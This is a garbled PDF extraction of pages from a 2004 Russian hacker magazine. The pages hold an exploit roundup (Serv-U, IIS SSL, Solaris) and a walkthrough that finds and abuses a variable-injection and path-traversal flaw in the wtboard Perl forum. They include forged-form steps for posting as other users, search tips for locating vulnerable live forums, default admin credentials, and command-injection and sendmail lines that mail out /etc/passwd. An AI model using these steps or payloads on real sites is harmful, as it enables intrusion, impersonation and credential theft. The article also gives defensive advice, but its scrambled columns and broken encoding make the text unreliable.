книги хакеры / журнал хакер / 065_Optimized
.pdf
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
ВЗЛОМ |
|||||
|
|
|
|
|
BUY |
|||||
|
|
|
|
to |
|
|
|
|||
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
||
ОБЗОР ЭКСПЛОЙТОВ
Докучаев Дмитрий aka Forb (forb@real.xakep.ru)
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
ХАКЕР/¹05(65)/2004 |
|
to |
|
|
|
|
|
|||
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
||
SERV-U FTPD REMOTE OVERFLOW EXPLOIT
ОПИСАНИЕ:
Любопытно, что уже третий месяц подряд выходят различные эксплойты для FTP-сервера «U FTPD». Если прошлые эксплойты были направлены на команду CHMOD, то вышедшая новинка получает шелл с помощью неверно переданного параметра к MDTM. Эта команда отображает время создания файла. Баг заключается в том, что размер этого файла не может превышать 256 байт. Когда хакер передает слишком длинный аргумент, происходит переполнение буфера. В этом случае может быть два варианта. Либо осуществится корректная передача шеллкода (с последующим открытием порта), применимого для определенной OS, либо сервис просто уйдет в даун.
ЗАЩИТА:
Эксплойт вышел недавно, и перед ним не устоял даже SERV-U последней версии. Поэтому защищайся только файрволом... или временно откажись от Serv-U и жди новых релизов на сайте www.serv-u.com.
ССЫЛКИ:
Рабочий эксплойт с целями для Win2k/XP находится здесь: www.security.nnov.ru/files/ex_servu.c. С подробным описанием бреши можешь ознакомиться тут: http://security.nnov.ru/search/document.asp?docid=5676.
ЗЛОКЛЮЧЕНИЕ:
Уязвимость представляет повышенную опасность. Учитывая, что добрая половина локальных юзеров не отрубают доступ anonymous’а к ресурсам, любой хакер может порулить компом зазевавшегося юзера. Поэтому, повторяюсь, только грамотно настроенный файрвол способен защитить тебя от злоумышленников.
GREETS:
Нехитрую багу обнаружил чувак с ником bkbll (bkbll@cnhonker.com). Что касается самого сплойта, то он был написан кодером Sam (Sam@0x557.org). Местоположение этих ребят остается неизвестным :).
IIS 5.0 + SSL REMOTE
DOS EXPLOIT
ОПИСАНИЕ:
Критическая уязвимость была найдена в модуле IIS 5.0, а точнее в библиотеке, обрабатывающей SSLсоединения. Если верить багтраку, то любой желающий может создать специально обработанное SSL-сообщение, которое заставит модуль прекратить обслуживание новых подключений. Не буду вдаваться в техническую часть баги, лишь скажу, что эксплойт под названием sslbomb.c за несколько секунд убивает SSL-модуль в IIS. Правда, на Windows 2003 прекращение работы SSL влечет за собой еще и дополнительный ребут, что было проверено лично мной ;).
ЗАЩИТА:
13 апреля Microsoft выпустила специальный патч, исправляющий 14 новых уязвимостей. В том числе и брешь в модуле SSL. Все линки, по которым ты можешь слить исправление, представлены на странице www.securitylab.ru/44490.html.
ССЫЛКИ:
Рабочий эксплойт выложен на многих порталах, в том числе и на Секлабе (www.securitylab.ru/_Exploits/2004/04/sslbomb.c). Помимо данной SSL-баги, в протоколе найдены другие недоработки. Прочитай статью http://packetstormsecuri- ty.nl/0403-advisories/eEye.iss.txt и ознакомься с ними.
ЗЛОКЛЮЧЕНИЕ:
Как ни странно, очень мало админов пропатчили свой IIS. Это доказывают множественные атаки на корпоративные серверы. После подобных нападений протокол SSL уходит в ступор и не возвращается до спасительной перезагрузки. Если ты админишь сервер под виндой, позаботься о здоровье своего IIS.
GREETS:
Эту багу в первую очередь изучила команда s21sec (www.s21sec.com). Эксплойтом занимались два кодера: Barroso Berrueta и Alfredo Andres Omella.
SOLARIS VFS_GETVFSSW() LOCAL ROOT EXPLOIT
ОПИСАНИЕ:
Оригинальная уязвимость найдена во всех версиях системы Solaris. Выяснилось, что любой желающий может загрузить ядерный модуль без дополнительных привилегий. Суть баги заключается в некорректной проверке каталога с модулем. Последний может находиться где угодно, например, в /tmp. Вызвать уязвимую процедуру vfs_getvfssw() можно через функции mount() либо sysfs(). Что и реализовано в пакете rootme.tar. Он состоит из нескольких файлов: исполняемого интерпретатора, модуля и эксплойта rootme.c. Чтобы ненавязчи- во порутать систему, нужно выполнить make, а затем запустить бинарник rootme. Произойдет несанкционированная загрузка модуля с последующим запуском рутового шелла.
ЗАЩИТА:
Сразу же после выхода эксплойта выпустили патч, закрывающий дырку. Он находится на известном сайте www.sunsolve.com по адресу http://sunsolve.sun.com/pubcgi/retrieve.pl?doc=fsalert%2F57479&zone_32=category%3Asecurity. Установи его и забудь о проблеме навсегда.
ССЫЛКИ:
Пакет rootme.tar находится здесь: www.security.nnov.ru/files/rootme.tar. Прочитать сводку в багтраке можно на этом же сайте (http://security.nnov.ru/search/document.asp?docid=5956).
ЗЛОКЛЮЧЕНИЕ:
Новая брешь в ядре довольно серьезна, потому как охватывает полный диапазон версий Solaris. Позаботься о том, чтобы все твои солярки были пропат- чены. В противном случае может произойти утечка важной информации с доверенных серверов ;).
GREETS:
Набор rootme.tar сделан уже упомянутым кодером Sam (Sam@venustech.com.cn). Что касается дырки, то ее нашел Dave Aitel и своевременно опубликовал в PDF-документе www.immunitysec.com/downloads/solaris_kernel_vfs.sxw.pdf.
|
|
|
|
|
Уводим сервис в даун |
|
Содержимое лога «system» после атаки на SSL |
|
Рут за несколько секунд |
|
|
|
|
|
59
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
d |
|
|
||
|
F |
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
NOW! |
o |
||||
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
||||
|
|
ВЗЛОМBUY |
||||||||
w Click |
to |
|
|
|
|
|
m |
|||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
g |
|
|
||
|
|
|
df |
|
n |
e |
|
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
ПОЧУВСТВУЙ
Докучаев Дмитрий aka Forb (forb@real.xakep.ru)
ÑÅÁß
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
ХАКЕР/¹05(65)/2004 |
|
to |
|
|
|
|
|
|||
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
||
|
БАГОИСКАТЕЛЕМ |
|
|
любом проекте существуют ошибки. И чем крупнее система, тем этих ошибок больше и их проще найти. Впрочем, "проще" |
|
 |
||
не значит "просто" - в ряде случаев поиск и использование уязвимостей даже для профессионалов превращается в |
||
серьезную головоломку. Но в случае распространения системы открытыми кодами, поиск багов превращается в |
||
|
увлекательное приключение! В этом мы и убедимся на примере одной популярной Perl-системы.
ФАТАЛЬНЫЕ ОШИБКИ В PERL-ПРОЕКТАХ
На компакте ты обнаружишь свежую версию wtboard (для твоих злых экспериментов), Apache + ActivePerl под винду
ГДЕ БУДЕМ ИСКАТЬ? |
ПОДГОТАВЛИВАЕМ |
dirkonf=/wtb # Относительный путь к web-каталогу, |
||
dirrealkonf=f:/soft/web/apache/htdocs/wtb # Абсолютный путь |
||||
Á |
агоискатель - человек, ищущий |
ОПЕРАЦИОННУЮ |
к web-каталогу, |
|
ошибки в каком-либо проекте |
Следующий шаг к цели - скачивание и уста- |
dircgi=/cgi-bin/wtb # Относительный путь к cgi-bin, |
||
с целью получения морального |
новка форума. На моем домашнем компью- |
realpath= # Путь к предыдущему каталогу, где находится |
||
либо материального удовлетво- |
тере стоит Apache и ActivePerl, поэтому я не |
папка форума (в моем случае - это корень). |
||
рения (некоторые получают |
обременял себя инсталляцией ПО. Если ты |
|
||
еще и сексуальное, но это не |
такой же продвинутый (в плане софта), то |
В этом же конфиге можешь изменить e-mail |
||
ко мне). Прежде всего надо |
просто скачивай с www.wtg.ru/download/wtboard.zip |
админа и другие параметры форума. Но учи- |
||
выбрать себе мишень - проект, |
свежую версию форума - ее ты, конечно |
тывая, что борда на твоем компе установлена |
||
в котором ты будешь искать баги. Следует |
же, найдешь и на нашем CD. Затем создай |
лишь в качестве подопытного кролика, все эти |
||
останавливаться лишь на раскрученных |
следующие каталоги: htdocs\wtb - каталог |
примочки можно оставить дефолтными. |
||
скриптах, потому как искать ошибку в мало- |
для хранения html-файлов, cgi-bin\wtb - |
Теперь открой скрипт wtbext.cgi и преобра- |
||
распространенном vote.pl не имеет смысла - |
здесь размещаются скрипты форума и cgi- |
зи путь к data-каталогу (в моем случае это |
||
если ты что-то найдешь, применить получен- |
bin\wtb\data - каталог с конфигами и базой |
просто "data"). После всего зайди на http://local- |
||
ные навыки ты сможешь только на несколь- |
данных. После этого выполни косметичес- |
host/wtb/ и удостоверься, что index на месте. |
||
ких убогих сайтах, а это едва ли можно наз- |
кие изменения конфига и двух скриптов. |
Напиши тестовое сообщение и проверь кор- |
||
вать достойной мотивацией. |
Открой cgi-bin\data\wtboard.txt и задай |
ректное сохранение данных. Все! Форум ус- |
||
После того как ты определился с жертвой, |
в нем 4 параметра: |
тановлен. Можно приступать к операции. |
||
необходимо скачать себе одну из свежих вер- |
|
|
||
сий системы (чтобы дырка не теряла своей ак- |
|
|
||
туальности), установить ее на собственном |
À ÊÀÊ ÆÅ *NIX? |
|
||
компьютере и все дальнейшие опыты произво- |
|
|||
дить только по адресу 127.0.0.1 - |
|
|
||
ты ведь не хочешь раньше времени получить |
сли борда крутится под Unix, то финт с заменой $wtbnames |
|||
подзатыльник? Руководствуясь этими ограни- |
||||
Å нужно модернизировать. Тебе не удастся создать файл в |
||||
чениями, я выбрал проект Wtboard - известный |
||||
форум от российских программистов. Если |
корне диска под правами Апача. Поэтому придется увести зна- |
|||
набрать в строке поисковика "wtboard", то он |
чение переменной в ../../../../../../../tmp (чем больше ../, тем на- |
|
дежнее). В этом случае wtbnames.txt.pag может быть создан |
||
выдаст тебе порядка 15 тысяч ссылок, что го- |
||
(хотя опять же зависит от секурности сервера). |
||
ворит о дикой популярности форума в России. |
||
|
60
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
||||
|
|
X |
|
|
|
|
|
||||
|
- |
|
|
|
|
|
d |
|
|||
|
F |
|
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
||||
|
|
|
|
|
|
|
|||||
|
|
|
|
|
BUY |
|
|
||||
|
|
|
|
to |
|
|
|
|
|
|
|
w Click |
|
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
||
|
|
|
df |
|
|
n |
e |
|
|||
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
-xcha |
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
ПОЧУВСТВУЙ СЕБЯ БАГОИСКАТЕЛЕМ
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
||
Изменяем главные параметры
Ýòî íå ôè÷à, ýòî áàãà
ИЗУЧАЕМ СОРЦЫ
Пока ты посылал сообщение, то, наверное, заметил, что для этой цели вызывается скрипт wtboard.cgi. Его и будем ковырять в первую очередь. Чтобы успешно найти брешь, нам важно понять принцип работы форума. Хотя читать чужой код, а особенно написанный небрежно, удовольствие сомнительное. Просмотрев по диагонали текст сценария, я понял, что первоначально вызывается скрипт wtbext.cgi, который содержит служебные процедуры, парсинг потока, анализ переменных и т.п.
Первая бага, на которую мне захотелось проверить проект - ошибка в функции open(). Если перед названием файла поставить конвейер |, то произойдет выполнение команды. Например, после выполнения open("|dir >1.txt"), в файл 1.txt запишется структура каталогов. Запусти поиск по функции open. Ты увидишь, что практически все переменные, находящиеся во втором параметре, создаются внутри скрипта и никак не передаются ин-
Ура! Форум работает!
терактивно. Это очень плохо для нас, т.к. выполнить команду при таком раскладе невозможно. Затем мне вспомнилась ошибка в open, при которой внешней программе (например, sendmail) можно передать дополнительные параметры в этой же функции. При этом, если переменная не проверяется на спецсимволы, вполне возможно сделать чтото плохое. Но опять же, вызова внешних программ в этих проектах не наблюдалось, как, впрочем, и функций system(), в которых также часто содержатся ошибки.
ИЗМЕНЯЕМ ПАРАМЕТРЫ
Итак, изучение сорцов не привело к обнаружению баги. Так всегда, поскольку наверняка найти уязвимость после однократного просмотра кода невозможно. Что ж, попробуем найти ее методом научного тыка. Заходим на главную страницу форума и перейдем на наше первое тестовое сообщение (напиши чтонибудь, если поленился сделать это раньше). Теперь жми "Написать ответ". Мы видим первую ошибку программиста - использование компрометирующего метода GET. При появ-
лении каких-либо параметров в адресной строке браузера невольно хочется их поменять :). Тебе никто не запрещает это сделать
-сервер твой, поэтому особой опасности в подстановке нет. В строке видна переменная numans. Судя по логике и ее значению (1), это номер сообщения, на которое ты отвеча- ешь. Смени значение на 2 и обнови страницу
-все поля окажутся пустыми. Еще бы, данного номера пока не существует. А что если...
правильно: подставить путь к нижележащему каталогу? Ведь файл сообщения имеет вид цифра.html, поэтому вполне возможно, что сценарий открывает $numans.html. Проверим на значении ../1. Получим пустые поля. Однозначно реакцию определить нельзя: либо скрипт проверяет спецсимвол и открыто игнорирует запрос (пошел на фиг, злобный хакер!), либо просто не находит файла ../1.html (что ты ко мне докопался? Нет у меня такого сообщения!). Тут, конечно, можно было просто посмотреть исходники и все сразу понять. Но делать это было решительно в лом, поэтому я просто перенес 1.html из папки форума на каталог выше. После обновления страницы
-о, чудо! - я увидел заполненные поля сооб-
Не отчаивайся, если не нашел багу после первого просмотра сорцов. Экспериментируй и насилуй hiddenпараметры и подозрительные опции, затем снова возвращайся к сорцам, меняй их, добавляй debugинформацию, и тогда удача тебе обязательно улыбнется!
В ПОИСКАХ ЖЕРТВЫ
×тобы найти новую жертву, просто
набери |
wtboard â |
||
строке любого поис- |
|||
ковика. Для твоего |
|||
изучения |
будут |
|
|
представлены поряд- |
|||
ка 20 страниц различ- |
|
|
|
ных форумов. Прав- |
|
|
|
да, не на всех бордах |
|
|
|
работает интерполя- |
|
|
|
ция - причины этого |
|
Сотни незадефейсенных форумов! |
|
ïîêà íå |
известны. |
|
|
Можно усложнить поиск, подставив wtboard/index.shtml, или еще лучше cgi-bin/data. Или data/wtbadmin.txt :). На все эти запросы ты найдешь порядочное число ссылок. Кстати, страница для администрирования форума находится в /wtboard/wtbadmin.htm.
Самая бажная функция
61
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
d |
|
|
||
|
F |
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
NOW! |
o |
||||
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
||||
|
|
|
ВЗЛОМBUY |
|||||||
w Click |
to |
|
|
|
|
|
m |
|||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
g |
|
|
||
|
|
|
df |
|
n |
e |
|
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Не стоит забывать, что статья дана лишь для ознакомления и организации правильной защиты с твоей стороны. За применение данного материала в незаконных целях автор и редакция ответственности не несут.
В качестве домашнего задания можешь проверить на уязвимость известный продвинутый форум iconboard. Слить его можешь отсюда: http://gross.unact.ru/ download/ikonboard/I b219rus_3.zip. 
ПОЧУВСТВУЙ СЕБЯ БАГОИСКАТЕЛЕМ
щения, а также полный путь к документу в теме мессаги, что свидетельствовало о наличии уязвимости.
Но, по сути, это лишь мелкая недоработка, которая даст тебе минимум дополнительных привилегий. А я уже говорил, что польза должна быть большой. Поэтому копаем дальше. Как я ни извращался (подставляя нул-бит %00 после 1 и дописывая имя к новому документу и т.п.), я не смог получить хоть какую-то нестандартную реакцию. И что-то меня подтолкнуло опять вернуться к изучению сорцов...
ВТОРОЙ РАУНД
Меня заинтересовал сценарий обработки потока. Он был выполнен в виде отдельной процедуры params(), а не стандартным CGI.pm. Открой wtbext.cgi и убедись в этом. Скудные комментарии на русском языке позволили мне немного ориентироваться в коде. Первое, что бросилось в глаза - заполнение хеша %inip. Когда я изучал wtboard.cgi, то видел, что этот хеш используется в каче- стве поглотителя переменных из потока. Это же имя юзалось для запоминания системных переменных. Это меня даже не насторожило, скорее удивило.
Заполнение системного хеша
# ini-данные конференции %inip=(%inip,
addip=>'off',
adviseans=>'on',
advisenew=>'on',
allowgreetings=>'on',
allowroot=>'on',
allrestrict=>0,
alwayscity=>'off',
alwaysemail=>'off', answerlabel=>'* ', archive=>'archive.htm',
);
Далее я убедился, что хеш %inip действительно юзается для поглощения потока. Это доказывала строчка $inip{$a1}=$a2, где $a1 была пропарсенная переменная, а $a2 - ее значение. Несколькими строками выше я увидел регулярное выражение, которое удаляло из $a1 посторонние символы, как, например $, @, ' и прочие. Идем дальше. Вроде бы ничего интересного, а я уже дошел до середины сценария... И тут меня привлек поразительный код следующего содержания:
sub initiate {my($s1,$s2);
while(($s1,$s2)=each%inip) {$s2=~s/([\'\\])/\\$1/g; eval "\$$s1='$s2';";
}
}
Грамотный программист сразу поймет назначение этой процедуры. Она интерполирует все переменные из хеша %inip в реальные. С учетом того, что этот хеш поглощает поток данных, можно попробовать подставить в него системную переменную, которая затем будет интерполирована в реальную и заменит ее прежнее значение! Но это в теории, а на практике может не подтвердиться,
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
ХАКЕР/¹05(65)/2004 |
|
to |
|
|
|
|
|
|||
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
ИЗВЕСТНЫЕ ОШИБКИ В PERL |
|
|
|
-x cha |
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
Âот список популярных уязвимостей в публичных CGI-скрип- тах (часть из них я уже перечислил):
1.Изменение неявно заданного параметра в функциях open() и system(). К примеру, в коде встречается конструкция system("cat script|grep $file"), а $file передается скрипту в каче- стве опции. Никто не запрещает присвоить $file="; ls -la > out.txt", а затем просмотреть результат выполнения команды. То же самое в open. Как я уже говорил, переменную-файл можно установить равной "|ls -la", что приведет к выполнению внешней команды.
2.Использование неявного открытия sendmail. При конструкции open("|/usr/sbin/sendmail $address"), можно выполнить команду, задав адрес равным "xakep@host.com << /etc/passwd". После этого файл с учетными записями придет на мыло хакеру.
3.Использование нуль-байта. Допустим, мы имеем следующий код:
$base="$input.db"; open(FILE,"<$base");
Если мы передадим скрипту input=num, то скрипт попытается открыть файл num.db. А если передадим input=num%00, Perl создаст $base="num\0.db" и попытается открыть файл num. Если файл существует, то он и будет прочитан. Все потому, что в Перле нуль-байт не означает конец строки, а воспринимается как часть данных, передающаяся C-функци- ям на обработку. А в Си этот байт есть EOL, поэтому обработка на нем обрывается.
4. SQL-injection. Эта уязвимость появилась после привязки Perl к базе данных. Она позволяет вывести произвольный запрос на экран (например, листинг аккаунтов системы) путем хитрой подстановки значений параметров. Подробнее об SQL-injection ты можешь прочитать в предыдущих выпусках Х.
Ты куда свой нос суешь, дрянной хакер?
но, во всяком случае, попробовать стоит, тем более что я не видел никаких ограниче- ний на новые элементы хеша.
ПРОБУРИВАЕМ ДЫРУ
Я надеюсь, ты еще не закрыл окно форума, потому что сейчас самое время протестировать уязвимость. Для этого подставим какуюнибудь системную переменную в качестве дополнительного параметра, например, $data.
Дописывай &data=/ в строку браузера и жми enter. Получаем довольно нестандартное сообщение: "Error: cannot open user base //wtbnames.txt.*". В общем-то, все верно, сценарий интерполировал переменную $inip{data} в реальную $data и заменил ее значение корневым каталогом. Таким образом, скрипт попы-
тался открыть $data/wtbnames.txt.* и обломался :). Такая вот чудесная интерполяция, товарищи. Кто-то, наверное, уже стал возмущаться: ну заменили мы одну переменную, и что с того? Я отвечу, что для более осязаемого результата необходимо включить соображалку и составить свой собственный алгоритм, после применения которого цель будет достигнута. В этой статье я покажу, как с помощью данной интерполяции писать сообщения на форум от определенного логина, не зная его пароля. В теории это в принципе невозможно, так как даже подстановка похожих русских букв проверяется и заменяется родными английскими. Но прежде чем составлять хакерский алгоритм, я упомяну о принципе работы аутентификации форума. Все
62
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
||||
|
|
X |
|
|
|
|
|
||||
|
- |
|
|
|
|
|
d |
|
|||
|
F |
|
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
||||
|
|
|
|
|
|
|
|||||
|
|
|
|
|
BUY |
|
|
||||
|
|
|
|
to |
|
|
|
|
|
|
|
w Click |
|
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
||
|
|
|
df |
|
|
n |
e |
|
|||
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
-xcha |
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
Добро пожаловать и все такое
юзеры вписываются в единую текстовую базу cgi-bin\wtb\data\wtbnames.txt.pag. В более ранних версиях это был просто wtbnames.txt, но сути это не меняет. Все данные по новому логину заносятся туда. Это происходит в слу- чае регистрации (получения первой мессаги от определенного имени). После каждого поста проверяется пароль для указанного логина. Если он неверный - сообщение не размещается. Наша задача обойти такую проверку. Обходить будем следующим путем: переопределим переменную $wtbnames на произвольное значение. К примеру, на
../../../../../../wtbnames.txt. Важно помнить, что открывать скрипт будет $data$wtbnames, а не просто $wtbnames. Видно, что после такой пластической операции сценарий будет обращаться к f:/soft/web/apache/cgibin/wtb/data/../../../../../../wtbnames.txt, что соответствует /wtbnames.txt. Все эти изощрения связаны с тем, что переменную $data нельзя менять, так как в этом случае скрипт не сможет открыть конфигурационный файл wtboard.txt. Приступим к действию. Вначале зарегистрируйся под новым пользователем xakep с паролем xak. Отправь от него какоенибудь сообщение (например, "hacked!!!"). Теперь попробуем создать ответ на это сообщение, якобы не зная пароля хакера. Прежде чем читерить, попробуй заменить в логине xakep букву "e" русской и послать ответ. Ты убедишься в том, что скрипт отклонит твою махинацию и погрозит тебе пальчиком :). Но это так, лишняя проверка. Настало время для более серьезных действий.
Сохраняй форму ответа себе на диск. Затем открывай любым редактором и ищи тег
<FORM>. Нашел? Замечательно, возьми с полки пирожок и меняй значение параметра action на абсолютный путь к скрипту wtboard.cgi. Затем строкой ниже впиши hid- den-поле: <input type=hidden name=wtbnames value=../../../../../wtbnames.txt>. Теперь открой локальный документ и заполни все необходимые поля. Только пароль поменяй на fucker (сорри за мой французский), а в сообщении напиши "fucked!!!". Жми "Отправить" и увидишь... правильно! Поздравления с регистрацией ;). Зайди на главную страницу и увидишь два сообщения от юзера xakep - истинное и подставное.
Что же произошло? Если ты посмотришь корень своего диска, где стоит Апач (в моем случае это f :), то увидишь там два файла wtbnames.txt.dir (временный) и wtbnames.txt.pag.
Âпоследнем можно узреть только что созданный аккаунт пользователя xakep.
Вот тебе и бага в проекте. Заметь, что я скачал свежую версию, и официальных заплаток от уязвимости пока нет. Да даже если и будут, никто на них своевременно не отреагирует. Теперь ты можешь беспрепятственно черкать мессаги от зарегистрированных юзеров, вводя других в заблуждение. Более того, немного подумав, ты научишься обходить бан на твой IP, писать в приватном форуме и т.д. и т.п. Одно плохо: нельзя выполнять команды. Даже видоизменение $data на значение "|dir >1.txt" не приведет ни к чему хорошему. Хотя как знать, может, ты окажешься багоискателем намного умнее меня.
Âтаком случае - респект тебе, ящик пива и крепкое рукопожатие.
Свежий wtbnames с аккаунтом хакера
ПОЧУВСТВУЙ СЕБЯ БАГОИСКАТЕЛЕМ 
È ÝÒÎ ÂÑÅ?
Нет, не все. Я не сказал настоящей причины, по которой я выбрал wtboard. Я юзал этот форум приличное время, поэтому знаю его устройство как свои 5 пальцев. Кроме указанной проблемы, у этой системы имеются значительные изъяны в дефолтной установке, поэтому мне захотелось копать дальше. Хочу рассказать тебе об этих изъянах, чтобы ты не оказался случайной жертвой хакера. По дефолту имеется такой хороший файлик wtbadmin.txt. Где он находится, ты, надеюсь, догадался, а о содержимом я расскажу. Туда вписываются юзеры, которым разрешено администрировать борду. Формат файла следующий: user;;pass;;access. Так вот, если ты не поменяешь этот файл, любой желающий сможет тебя задефейсить, войдя под логином admin с аналогичным паролем. Даже если ты изменил значение файла, есть шанс, что тебя поимеют. В моем примере я выложил data в область, доступную для httpd. Так делать нельзя, поскольку любой желающий может запросить cgi-bin\data\wtbadmin.txt и подглядеть системные аккаунты. Подглядеть - это в лучшем случае. В худшем, хакер немного порулит твоей бордой, подключит через SSI бэкдор и будет рулить системой. Чтобы всего этого не произошло, очень рекомендуется увести системные конфиги за пределы WWW, а также переименовать структурные файлы как физически, так и в wtboard.ini. И напоследок закачай во все системные каталоги .htaccess с директивой Deny from all - это не позволит злоумышленнику лазить где не надо. Только в этом случае ты защитишься от указанных недочетов. А от этой дыроч- ки официального спасения пока не существует, зато существует неофициальное - я переписал кусок кода, заносящий в хеш переменные из потока (функция initiate()), пропатченную версию форума ты найдешь на нашем диске. Искренне надеюсь на то, что эта статья будет тебе хорошим уроком - программистам нельзя доверять, особенно если они поддерживают OpenSource-проект и родом из России :). z
Два сообщения якобы от одного лица
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
